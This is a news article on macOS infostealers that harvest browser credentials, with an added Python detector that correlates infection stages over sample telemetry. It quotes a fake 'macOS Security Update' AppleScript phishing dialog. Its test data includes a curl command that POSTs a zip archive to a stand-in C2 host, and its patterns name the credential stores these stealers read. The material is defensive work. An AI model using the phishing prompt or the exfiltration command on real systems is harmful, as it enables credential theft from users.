Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data
The cybersecurity landscape is witnessing an alarming surge in macOS-targeted information-stealing malware, marking a significant shift from the traditional Windows-centric threat model.
These sophisticated infostealers are rapidly evolving to exploit macOS environments with unprecedented precision, targeting valuable data including browser credentials, cookies, and autofill information that serve as gateways for ransomware groups and initial access brokers.
The emergence of these macOS infostealers represents a calculated response to the growing enterprise adoption of Apple systems. Unlike their Windows counterparts, these threats leverage platform-specific attack vectors to bypass traditional security measures.
The malware’s primary objective centers on harvesting browser-stored data, host information, and installed application details, creating comprehensive digital fingerprints of infected systems.
Flashpoint Intel Team analysts identified four prominent strains dominating the current threat landscape: Atomic Stealer, recognized as the most prevalent Malware-as-a-Service offering; Poseidon Stealer, a sophisticated variant with connections to Atomic’s development team; Cthulhu, another significant MaaS platform; and Banshee, contributing to the expanding ecosystem.
These families collectively process over 300 million credential sets monthly, with approximately 50 million unique credentials and 6 million never-before-seen entries captured across 1.5 million infected hosts.
Technical Infection Mechanisms and System Exploitation
The infection methodology employed by these infostealers demonstrates sophisticated understanding of macOS architecture.
The malware primarily utilizes AppleScript for generating deceptive authentication prompts, exploiting user trust in legitimate system dialogs.
A typical infection sequence begins with an AppleScript prompt such as:
display dialog "System Update Required" with title "macOS Security Update" buttons {"Cancel", "Install"} default button "Install"
Following successful social engineering, the malware executes system profiler commands to enumerate hardware and software configurations.
The system_profiler SPHardwareDataType command reveals system specifications, while system_profiler SPApplicationsDataType catalogs installed applications, providing attackers with detailed reconnaissance data.
Data exfiltration occurs through HTTP POST requests to command-and-control servers, with collected information compressed using standard archiving utilities.
The malware typically targets Safari’s keychain entries, Chrome’s Local State files, and Firefox’s logins.json databases, systematically harvesting stored credentials before transmission to remote infrastructure.
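The chain the article describes (fake AppleScript prompt, system_profiler reconnaissance, reads of browser credential stores, HTTP POST exfiltration) is more useful to a defender as a sequence than as four isolated indicators. The script below is an added example, not code from the article or from Flashpoint: it runs a per-process-tree heuristic over constructed process and file-access telemetry. The Event schema, the tag names, the allow-list of processes expected to read credential stores, and the sample records are all assumptions chosen for illustration; real EDR output will need its own field mapping.

```python
"""Heuristic detection of the macOS infostealer chain described above, run over
constructed process and file-access telemetry (not real EDR output)."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One telemetry record: a process launch or a file read by a process."""
    pid: int
    ppid: int
    process: str          # executable name as the sensor reports it
    cmdline: str          # full command line (empty for file events)
    file_path: str = ""   # path read, set only on file-access events


# Credential stores the article names as harvest targets (path patterns).
CREDENTIAL_STORE_PATTERNS = [
    re.compile(r"/Library/Keychains/"),                    # Safari / login keychain
    re.compile(r"/Google/Chrome/Local State$"),            # Chrome Local State
    re.compile(r"/Firefox/Profiles/[^/]+/logins\.json$"),  # Firefox logins.json
]
# Processes expected to touch those stores: an assumed allow-list, tune per fleet.
EXPECTED_READERS = {"Google Chrome", "firefox", "Safari", "securityd"}
RECON_ARGS = ("SPHardwareDataType", "SPApplicationsDataType")


def classify(ev):
    """Map one event to the attack stages it matches (possibly none)."""
    tags = set()
    if ev.process == "osascript" and "display dialog" in ev.cmdline:
        tags.add("fake_prompt")
    if ev.process == "system_profiler" and any(a in ev.cmdline for a in RECON_ARGS):
        tags.add("recon")
    if ev.file_path and ev.process not in EXPECTED_READERS \
            and any(p.search(ev.file_path) for p in CREDENTIAL_STORE_PATTERNS):
        tags.add("credential_store_read")
    if ev.process == "curl" and re.search(r"-X\s*POST|--data|-d\s|-F\s", ev.cmdline):
        tags.add("http_post")
    return tags


def root_of(pid, parent):
    """Climb the ppid chain to the highest ancestor present in the telemetry."""
    seen = set()
    while pid not in seen and parent.get(pid) in parent:
        seen.add(pid)
        pid = parent[pid]
    return pid


def detect(events, min_stages=3):
    """Group stage hits by process tree and report trees showing at least
    min_stages distinct stages. A lone system_profiler call is admin noise;
    prompt, recon, store read and POST under one root is not."""
    parent = {e.pid: e.ppid for e in events}
    stages = {}
    for e in events:
        stages.setdefault(root_of(e.pid, parent), set()).update(classify(e))
    return {r: sorted(s) for r, s in stages.items() if len(s) >= min_stages}


# Constructed sample telemetry: an admin's one-off inventory (tree 500),
# Chrome reading its own Local State (tree 700), and a stealer chain (tree 900).
HOME = "/Users/alice/Library"
SAMPLE_EVENTS = [
    Event(500, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    Event(501, 500, "system_profiler", "system_profiler SPHardwareDataType"),
    Event(700, 1, "Google Chrome", "", file_path=HOME + "/Application Support/Google/Chrome/Local State"),
    Event(900, 1, "Update", "/Users/alice/Downloads/Update.app/Contents/MacOS/Update"),
    Event(901, 900, "osascript", "osascript -e 'display dialog \"System Update Required\" with title "
          "\"macOS Security Update\" buttons {\"Cancel\", \"Install\"} default button \"Install\"'"),
    Event(902, 900, "system_profiler", "system_profiler SPHardwareDataType"),
    Event(903, 900, "system_profiler", "system_profiler SPApplicationsDataType"),
    Event(900, 1, "Update", "", file_path=HOME + "/Keychains/login.keychain-db"),
    Event(900, 1, "Update", "", file_path=HOME + "/Application Support/Google/Chrome/Local State"),
    Event(900, 1, "Update", "", file_path=HOME + "/Application Support/Firefox/Profiles/x1y2.default/logins.json"),
    Event(904, 900, "curl", "curl -X POST --data-binary @/tmp/out.zip http://c2.example.invalid/gate"),
]

if __name__ == "__main__":
    for root, hits in detect(SAMPLE_EVENTS).items():
        print(f"suspicious process tree rooted at pid {root}: {', '.join(hits)}")
```

Correlating by process tree rather than by single indicator is the design choice worth keeping: system_profiler and osascript are routine on managed Macs, and browsers legitimately read their own stores, so each tag alone is noisy, while three or more stages under one non-browser root within a short window is a much stronger signal.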
This technical sophistication, combined with the rapid evolution of detection evasion techniques, positions macOS infostealers as a formidable threat requiring immediate organizational attention and enhanced security measures.